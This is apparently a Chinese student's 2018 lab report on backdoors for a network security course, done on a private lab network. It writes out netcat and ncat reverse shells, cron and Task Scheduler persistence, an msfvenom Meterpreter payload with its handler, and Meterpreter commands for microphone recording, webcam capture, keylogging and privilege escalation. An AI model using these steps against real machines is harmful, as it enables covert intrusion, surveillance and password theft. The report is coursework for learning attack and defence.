# Exp2 后门原理与实践。
Exp2 后门原理与实践
20154316 王帅峰
2.1简单后门
一、后门工具介绍
1.netcat(nc、ncat)
是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
2.socat
类似于Netcat的加强版。
以上两个工具均可以在老师课件主页的附件中下载.
3.Meterpreter
利用 Metaspolit 的 msfvenom 指令生成后门可执行文件,本实验要生成的这个后门程序就是Meterpreter。
二、ncat、socat的基础操作
2.1 Windows与linux间获取Shell
2.1.1 Windows主机获取 Linux Shell
Windows:
win主机查本机IP地址:ipconfig
由上图可见IPv4 地址为:192.168.192.129
2.利用netcat.exe程序监听端口:4316
3.使用nc 192.168.192.129 4316 -e /bin/sh指令反向连接Windows主机的4316端口:
192.168.192.129为win主机地址,端口号为自己学号
4.Windows执行linux shell指令
2.1.2 Linux主机获取 Windows shell
Linux :
查看kali主机IP地址:ifconfig
上图可见kali主机IP地址为192.168.192.130
2.输入nc -l -p 4316
指令监听端口
Windows:
3.在cmd窗口使用 ncat.exe -e cmd.exe 192.168.192.130 4316
命令去连接Linux的4316端口。
4.Linux运行Windows shell
连接成功后便可以在linux主机输入windows指令,正常情况下为乱码
2.2 ncat进行数据传输
1.Windows输入指令ncat.exe -l 4316
监听
2.Linux输入指令nc 192.168.192.129 4316
连接win主机
3.双向传输字符串
这是两台主机传送消息的截图
2.3 ncat 定时启动
1.Windows输入指令ncat.exe -l -p 4316
监听
2.Linux输入指令crontab -e ,选择一个文本编辑器打开,在最后一行添加代码:40 * * * * /bin/netcat Win的IP 端口 -e /bin/sh
在每小时的40分运行ncat回连win主机
3.时间到了,可以运行Linux shell指令了
我当时时间设置代码的时间是每小时的35分钟。
2.4 socat 定时启动
1.在Windows桌面按键win+I,依次打开 控制面板->系统和安全->管理工具->任务计划,新建一个任务
2.新建一个触发器
3.新建一个操作
其中参数为tcp-listen:4316 exec:cmd.exe,pty,stderr ,4316
为端口号
4.确定,查看程序是否在运行,如未运行点击右侧运行按钮使其运行
5.Linux输入指令 socat - tcp:192.168.192.129 4316, windows主机IP、端口号,此时可以获取win的shell命令
三、体验 MSF Meterpreter 功能
3.1 利用msfvenom指令生成后门程序
1.在Linux主机输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=Linux的IP LPORT=端口 -f exe > 20154316_backdoor.exe
,此条指令意为生成一个.exe程序,名称为 20154316_backdoor,将来在windows上运行时会回连到Linux主机相应端口
2.成功之后该文件在当前目录,可以输入ls指令进行查看,找到之后拷贝到Windows主机,地址随意
3.2 linux进入控制台进行设置
1.Linux输入指令msfconsole
2.在msf>下输入命令use exploit/multi/handler
3.继续输入set payload windows/meterpreter/reverse_tcp
设置 payload
4.输入指令set LHOST Linux IP
5.输入指令 set LPORT 4305
6.输入指令show options
3.3 linux开启监听,windows运行后门
1.Linux输入指令exploit
开始监听
2.windows主机双击后门木马程序执行
3.4 Linux主机操控Windows主机
3.4.1 输入指令record_mic
录制一段音频
3.4.2 输入指令webcam_snap
拍摄照片
开始出错,没能成功的的打开摄像头,用了4312曾林的方法之后成功了。
3.4.3 输入指令screenshot
截取屏幕
3.4.4 输入指令keyscan_start
记录击键内容,输入指令keyscan_dump
获取击键记录
3.4.5 输入指令getuid
查看当前用户,输入指令getsystem
提权
四、回答问题
1.例举你能想到的一个后门进入到你系统中的可能方式?
下载软件时绑定了后门木马
不良的链接点进去直接打开了木马
2.例举你知道的后门如何启动起来(win及linux)的方式?
win中的木马可能伴随软件一同启动或者是通过点击启动
Linux可通过cron启动
3.Meterpreter有哪些给你映像深刻的功能?
窃取摄像机,容易造成隐私泄露
记录键盘击键顺序,会泄露密码以及个人隐私
4.如何发现自己有系统有没有被安装后门?
学好网络攻防的相关知识,自己处理计算机安全漏洞
五、实验感想
这次实验较上次实验个人感觉趣味性比较大,做起来也比上次的实验易懂,过程中对一些指令的理解还需加强,不过学好这个技术还是很有用的,相对的也让我想到了计算机安全的重要性,希望在以后的实验中能够更多的掌握这门有用的知识,保护好个人计算机的安全。
posted on 2018-03-29 22:15 wangshuaifeng 阅读(205) 评论(0) 编辑 收藏 举报